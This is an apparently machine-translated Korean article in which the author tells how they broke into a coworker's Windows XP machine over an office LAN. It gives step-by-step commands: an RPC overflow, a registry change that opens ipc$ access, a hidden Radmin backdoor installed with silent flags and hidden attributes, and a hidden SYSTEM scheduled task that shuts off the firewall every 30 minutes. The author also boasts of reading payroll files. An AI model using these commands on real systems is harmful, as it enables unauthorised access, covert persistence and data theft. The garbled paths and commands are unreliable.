기금넷 공식사이트 - 경제 뉴스 - NT 시스템 침입 방법
NT 시스템 침입 방법
장난치지 않는 것이 좋습니다.
135를 통해 침입할 수 있습니다. 이는 XP 시스템에서 가장 흔한 취약점이며 매우 쉽습니다.
성공적으로 수행한 기사도 있습니다. 예
참고용
먼저 명령 프롬프트를 열고 ping 명령을 사용하여 192.168.16.4에서 응답했습니다. bytes=32 time<1ms TTL=128, 설명 상대방은 방화벽이 없어 침입이 가능할 수 있습니다. 다음으로 X-SCAN 3.2를 사용하여 자세히 살펴보았습니다. 상대방 컴퓨터의 운영체제는 XP입니다. XP 시스템이 상당히 안전하다는 것은 일부 해커 포럼에서 많이 논의되고 있는 것 뿐입니다. 이러한 시스템에 침입하는 방법에는 두 가지가 있습니다. 하나는 피싱을 이용하는 것인데, 이는 상대방이 트로이 목마를 이용해 이를 제어할 수 있도록 하는 수동적인 방법입니다. 두 번째 방법은 상대방이 RPC 오버플로 등 심각한 취약점을 갖고 있는 경우이다. 이런 경우에는 오버플로우 프로그램을 이용하여 오버플로우시킨 후 제어용 프로그램을 업로드하여 제어하시기 바랍니다. 스캔 결과는 한동안 정말 기뻤습니다. 상대방 컴퓨터에는 수많은 취약점이 있었습니다. 그 중 가장 유명한 것 중 하나는 Shockwave가 악용한 RPC 취약점이었습니다. 이 취약점은 2003년에 전 세계를 휩쓸었습니다. 이 취약점이 있음을 알고 다음 단계는 오버플로 프로그램을 찾는 것이었습니다. 일부 오버플로 프로그램이 이 컴퓨터에서 효과적이지 않은 것 같았기 때문에 한동안 바빴습니다. 이 도구들의 이름조차 기억나지 않지만 꽤 많이 있습니다. 마침내 오버플로 프로그램 XP.EXE가 발견되었고 이 프로그램이 마침내 컴퓨터를 오버플로했습니다. CMDSHELL이 있습니다. 이는 작은 승리라고 할 수 있다.
CMDSHELL이 있는데 제어 프로그램을 어떻게 업로드해야 하나요? 잠시 고민하다가 드디어 영감이 떠올랐어요. 저와 같은 근거리 통신망에 있으니 *** 공유를 이용해서 업로드하는 게 가장 편리해요. 그래서 네트워크 환경을 열어서 작업그룹 컴퓨터를 확인하고 이 컴퓨터를 찾아서 더블클릭했는데 들어가지 못했습니다. 제가 분석한 바에 따르면 상대방 컴퓨터가 아니었을 수도 있습니다. XP 시스템이었으므로 네트워크 설치 마법사를 실행하세요. *공유를 사용하여 파일을 전송하려면 이 마법사를 실행해야 합니다. 이 마법사를 실행하면 "제어판-관리 도구-로컬 보안 정책"을 열 수 있습니다. "를 클릭하고 "로컬 정책"-"사용자 권한 할당"을 확장합니다. 오른쪽에는 "네트워크에서 이 컴퓨터에 대한 액세스 거부"라는 보안 정책이 있습니다. 상대방 컴퓨터의 해당 정책에는 사용자 GUEST가 설정되어 있어야 한다고 생각합니다. 이것이 기본적으로 *** 공유 액세스가 GEUST 사용자로 로그인되어 있기 때문에 해당 *** 공유를 열 수 없는 이유입니다. , 보안 설정이 GUEST의 네트워크 액세스를 허용하지 않기 때문에 ***에 액세스할 수 없습니다. XP의 기본 공유 모드는 단순 파일 공유이기 때문입니다. 이는 WIN2000 시스템과 다른 점입니다. WIN2000 시스템인 경우 관리자 비밀번호를 알고 있다면 net use IPipc$ "password" /user: username 명령을 사용하여 상대방과 ipc$ 연결을 설정할 수 있습니다. 다음은 트로이 목마 프로그램 ipd$를 복사하여 트로이 목마를 업로드하는 것입니다. XP에서는 그렇지 않습니다. 관리자 비밀번호를 알고 위의 명령을 사용해도 ipc$ 연결을 설정할 수 없습니다. 이것이 바로 XP가 2000 시스템보다 더 안전한 이유입니다. 다음으로 하고 싶은 일은 XP 공유 모드를 2000 공유 모드로 수정하는 것입니다.
방법은 다음과 같습니다. 오버플로로 얻은 CMDSHELL 아래에 다음 명령을 입력합니다:
echo Windows Registry Editor Version 5.00 >c:123.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >> c:123.reg
echo.>>c:123.reg
echo "forceguest"=dword:00000000 >>c:123.reg
regedit /e c:123 .reg
이 명령을 입력하면 상대방의 XP 공유 모드는 2000과 동일하게 됩니다. 이러한 명령의 의미를 설명하겠습니다. echo Windows 레지스트리 편집기 버전 5.00 >c:123.reg 명령은 Windows 레지스트리 편집기 버전 5.00의 문자를 c:123.reg 파일에 저장합니다. 첫 번째 문장의 >와 다음 문장의 >>의 차이점에 주의해야 합니다. > 문자는 덮어쓰고, >>는 추가하고, 세 번째 문장에서는 echo를 사용합니다. 이 문장은 매우 중요합니다. 이 문장을 추가하지 않으면 성공하지 못합니다. 레지스트리 파일을 열고 보면 두 번째 줄이 비어 있습니다. 이 점에 유의해야 합니다. 처음 4개의 명령을 실행하면 상대방의 C 드라이브 아래에 다음 내용이 포함된 123.reg 파일이 생성됩니다.
Windows 레지스트리 편집기 버전 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
다섯 번째 명령은 이 REG 파일을 레지스트리로 가져오는 것입니다. 이 다섯 가지 명령을 실행한 후 ipc$를 사용하여 2000 시스템을 운영하는 것처럼 제어할 수 있습니다. 다음으로 제어 프로그램을 업로드합니다. 저는 RADMIN2.0 서비스 프로그램을 선택했는데, 이 설치에는 그래픽 인터페이스가 필요하다고 물었습니다. CMDSHELL에서 설치하면 됩니다. 설치 전 준비가 필요합니다. 먼저 REG 파일을 생성합니다. 파일 이름은 다음과 같습니다.
Windows 레지스트리 편집기 버전 5.00
[HKEY_LOCAL_MACHINESYSTEMRAdminv2 .0ServerParameters]
"DisableTrayIcon"=hex:01,00,00,00
이 기능은 생성된 서버 프로그램이 알림 표시줄에서 아이콘을 숨길 수 있도록 하는 것입니다. RADMIN 서버 프로그램이 정상적으로 설치된 후 알림 표시줄에 작은 아이콘이 표시된다는 점을 알고 계십시오. 누군가의 집에 침입하려면 당연히 이 작은 아이콘을 제거해야 합니다. 그렇지 않으면 발견될 것입니다. 그런 다음 다음 내용으로 aaa.bat라는 BAT 파일을 생성합니다.
r_server /install /silence
r_server.exe /port:2233 /pass:1 /save /silence
regedit.exe /s aaa.reg
net start r_server
이 명령은 설치 명령으로 연결 포트를 2233으로 설정합니다. 1. 숨겨진 설치 인터페이스를 통해 설치한 후 aaa.reg를 레지스트리로 가져오고 r_server 서비스를 시작합니다.
준비가 완료되면 파일을 업로드할 차례입니다. 한 번에 4개의 파일을 업로드해야 하는데, aaa.reg aaa.bat r_server.exe admdll.dll이고 마지막 2개 파일은 다음 위치에 있습니다. RADMIN 설치 디렉터리 예. RADMIN2.0 클라이언트를 설치한 후 이 두 파일은 설치 디렉터리에 있습니다. 먼저 ipc$ 연결을 설정합니다. net use 192.168.16.4ipc$ "" /user:administrator 팁: 명령이 성공적으로 완료되었습니다. 다음:
r_server 192.168.1.4admin$system32 복사
aaa.bat 192.168.1.4admin$system32 복사
aaa.reg 192.168.1.4admin$ 복사 system32
copy admdll.dll 192.168.1.4admin$system32
그런 다음 오버플로로 얻은 CMDSHELL을 입력하고 다음을 입력하세요.
attrib +s +h +r c : windowssystem32r_server.exe
attrib +s +h +r c:windowssystem32admdll.exe
attrib +s +h +r c:windowssystem32aaa.bat
attrib +s + h +r c:windowssystem32aaa.reg
이 명령은 이 4개의 파일을 시스템의 숨겨진 읽기 전용 파일로 설정하여 다른 관리자가 발견할 가능성을 줄입니다.
다음 단계는 aaa.bat를 실행하는 것입니다. 작업이 성공한 후 radmin2.0 클라이언트를 사용하여 포트를 2233으로 변경했습니다. 연결에 성공했습니다. 비밀번호는 1입니다. 상대방의 화면을 보는 데 성공했습니다. 하하, 침입 아이디어부터 침입 통제 성공까지 단 4일밖에 걸리지 않았습니다.
들어가보니 상대방이 자신의 컴퓨터로 QQ 로얄 게임을 하고 있는 걸 봤는데, 저도 원래는 그걸 위해 관리자를 새로 만들었어요. ipc$ 연결을 했는데 RADMIN 제어권을 얻은 후 삭제하는 것을 잊어버렸습니다. 실수로 넘치는 CMDSHELL 아래에 EXIT 명령을 입력했습니다. 그 결과 다른 컴퓨터에서 종료 인터페이스까지의 카운트다운이 표시되어 처리되지 않았습니다. 그 당시 RADMIN의 CMD 기능을 사용했다면 shutdown 명령을 입력했습니다. -A는 종료 인터페이스에 대한 카운트다운을 취소할 수 있지만 그 시점에 이를 처리하지 않아 다른 문제가 발생했습니다. 재부팅 후 상대방의 관리자가 새로 생성된 사용자를 본 것 같습니다. 나중에 RADMIN을 사용하여 원격으로 볼 때 이 새 사용자는 사용자 이름이 ip$이고 아이콘이 너무 과시적이라는 느낌이 들었습니다. 크고 붉은 꽃이다.
오후에 그 컴퓨터의 관리자가 도움을 줄 전문가를 고용했다는 것을 알았습니다. 우리 LAN의 모든 컴퓨터는 우리 사무실에 있는 컴퓨터를 통해 인터넷에 연결되어 있기 때문에 전문가가 먼저 우리 사무실 컴퓨터를 확인하고 문제가 없다는 것을 발견한 후 그는 원래 설치된 Jiangmin을 Kabbah로 교체했습니다. 그는 해커가 바로 코앞에 있다는 것을 몰랐습니까? . . . 마스터는 내가 제어하는 컴퓨터에 Kabbah를 설치했습니다. 원래 바이러스 백신 소프트웨어는 Norton이었고 WINDOWS도 업데이트했습니다. 그러나 이러한 방법은 이미 당신을 제어했고 패치는 쓸모가 없습니다. 전문가가 몇 차례 점검하고 수리한 후에도 내 백도어가 여전히 존재하는 것 같습니다. 전문가 수준이 그다지 좋지 않은 것 같습니다. 나는 그것에 ipc$ 기능을 주었지만 그도 그것을 찾지 못했습니다. 어쩌면 그는 자신의 일거수일투족이 내 감시하에 있다는 것을 모르고 단순한 바이러스 공격이라고 생각하고 가볍게 받아들였을지도 모른다. 하하. . .
다음 작업은 제가 보기엔 비교적 간단합니다. 텔넷 서버를 열고 "원격 데스크톱"을 열어서 정오에 퇴근하고 컴퓨터가 열릴 때까지 기다립니다. 컴퓨터 관리자가 떠난 후 RADMIN으로 로그인하여 몇 가지 설정을 수행했습니다. 나중에 RADMIN의 파일 관리 기능을 통해 이 컴퓨터에 있는 파일을 살펴보니 재무제표, 급여표 등이 몇 가지 있었지만 그다지 매력적이지는 않았습니다. 그런데 우리 그룹 상사의 월급이 한 달에 10,000위안이 넘는 걸 봤어요! ! 너무 어두워요. . . 너무 많은데 월급이 고작 몇백위안인데 정말 억울하고 분개스럽습니다. . . .
나중에 RADMIN을 통해 상대방 컴퓨터를 조작하던 중 우연히 관리자에게 발견됐는데, 상대방의 관리자도 윈도우 패치를 적용하고 강력한 카파를 설치해 놓았기 때문에 많이 놀랐던 것 같습니다. 그는 아직도 해냈어. 불확실한 해커! ! 하하, 카바는 RADMIN을 죽이지 않았기 때문이죠. 나중에 상대방의 관리자가 LAN의 "로컬 영역 연결"에서 방화벽 기능을 활성화했기 때문에 상대방 컴퓨터에 연결할 수 없었습니다. RADMIN은 순방향 연결이기 때문에 상대방이 방화벽을 가지고 있는 경우에는 사용할 수 없습니다. 어느 날 오후 퇴근 후 실수로 이 컴퓨터의 IP를 핑(ping)했는데 응답이 있었습니다. 상대방의 방화벽이 닫혔다는 뜻입니다. 바로 RADMIN을 사용해서 연결했는데 성공했습니다. 현기증이 난다. . . 알고 보니 상대방은 방화벽만 열었을 뿐 이 명백한 백도어를 찾지 못한 것으로 드러났습니다. 방화벽을 켠 것은 컴퓨터 전문가였던 것 같습니다. 관리자는 자신의 수준에 따라 이 방법을 생각하지 않았을 것입니다. 하지만 텔넷 서버가 닫히고, 3389 원격 데스크톱도 닫혀 공유 모드가 다시 원래 상태로 변경되었습니다. 전문가 역시 몇 가지 허점을 발견하고 수정한 것으로 보이지만 백도어를 발견하지 못해 제2의 침입 기회를 만들어준 것 같습니다. 그 사람은 정책이 있고 나는 그 사람을 위해 방화벽을 켤 수 있고, 나는 그 사람을 위해 방화벽을 끌 수 있습니다. 어떤 사람들은 관리자가 방화벽을 다시 켜면 더 이상 할 일이 없다는 뜻 아닌가요? 하하. . . 모든 질병을 확실히 치료할 수 있는, 제가 직접 연구한 독특한 비법을 아래에 알려드리겠습니다! 하하. . . .
내 접근 방식은 숨겨진 예약 작업을 만드는 것입니다. 이 예약된 작업은 30분마다 방화벽을 종료하여 상대방의 관리자가 방화벽을 열어도 아무런 효과가 없도록 합니다.
방법은 다음과 같습니다. 먼저 abc.bat 배치 파일을 생성하여 c:windowssystem32 디렉터리에 배치합니다. 내용은 다음과 같습니다.
net stop sharedaccess
물론, 30분 안에 Skynet Firewall을 종료하고 싶다고 말하면 다음 명령을 추가할 수 있습니다.
taskkill /IM rfw.exe /f
*** 공유 모드를 사용하려면 고급 * 공유 모드이므로 다음 명령을 추가할 수 있습니다:
regedit /e c:windowssystem32abc.reg
물론 이 모드는 사전에 c:windowssystem32 디렉터리에 abc.reg를 업로드해야 하며 내용은 다음과 같습니다:
Windows 레지스트리 편집기 버전 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
숨겨진 예약 작업을 만드는 방법에 대해 이야기하겠습니다:
상대방 컴퓨터의 CMDSHELL 아래에 다음 명령을 입력하세요:
schtasks /create /tn "Resident" /tr c:windowssystem32abc.bat /sc min /mo 30 /ru "system"
상대방 컴퓨터에서 SYSTEM 권한으로 실행되는 예약된 작업을 생성합니다. 예약된 작업은 30분마다 실행됩니다. c: windowssystem32abc.bat 이 기능은 abc.bat의 명령줄을 기반으로 결정됩니다. 이 새로운 발견은 영리하게 사용된다면 매우 강력할 수 있습니다. 이것만으로는 숨겨진 요구 사항을 충족할 수 없는 경우에도 제어판 - 작업 스케줄러를 열어 그 존재를 확인할 수 있습니다. 알겠습니다. 숨기는 방법은 다음과 같습니다. 아니면 CMDSHELL을 입력하세요. attrib +h c:windowstasks resident.job 명령을 입력하고 Enter 키를 누른 다음 제어판의 작업 일정으로 이동하여 이전 작업이 사라졌는지 확인하세요. 이것은 표면적으로는 사라지지만 실제로는 여전히 존재합니다. CMDSHELL 아래에 schtasks 명령을 입력하여 볼 수 있습니다. 이렇게 하면 상대방 관리자가 어떻게 설정을 수정하더라도 30분마다 수정 사항이 다시 적용됩니다. 내 통제에서 벗어나는 것은 매우 어렵습니다. 하하. . .
- 관련 기사
- 주마오허는 어떤 역사적 사건을 언급하는가?
- "성천국의 문"(개정판)을 읽고 생각해 보세요(유커순) txt 전체 세트 다운로드
- Inspiring Passion의 모든 음악을 요청합니다
- 타이타닉 자막을 번역한 팀은 어디인가요? 잭, 천천히 젠장! 체코슬로바키아? 이 번역팀의 이름은 무엇입니까? 유머 감각을 가지세요! !
- 벨소리를 변경할 때 어떤 번호로 전화해야 하나요?
- US$는 무엇을 의미하나요?
- 10일 동안의 랴오청 일기 예보
- BMW를 터치하세요
- 1990년대 출생 소방관들의 희생에 관한 뉴스 영문판
- 연말까지 5G가 상용화될 수 있다는 것이 온라인에 공개되었습니다. 주요 통신사 3곳과 휴대전화 제조업체가 이 기능을 그토록 중요하게 여기는 이유는 무엇일까요?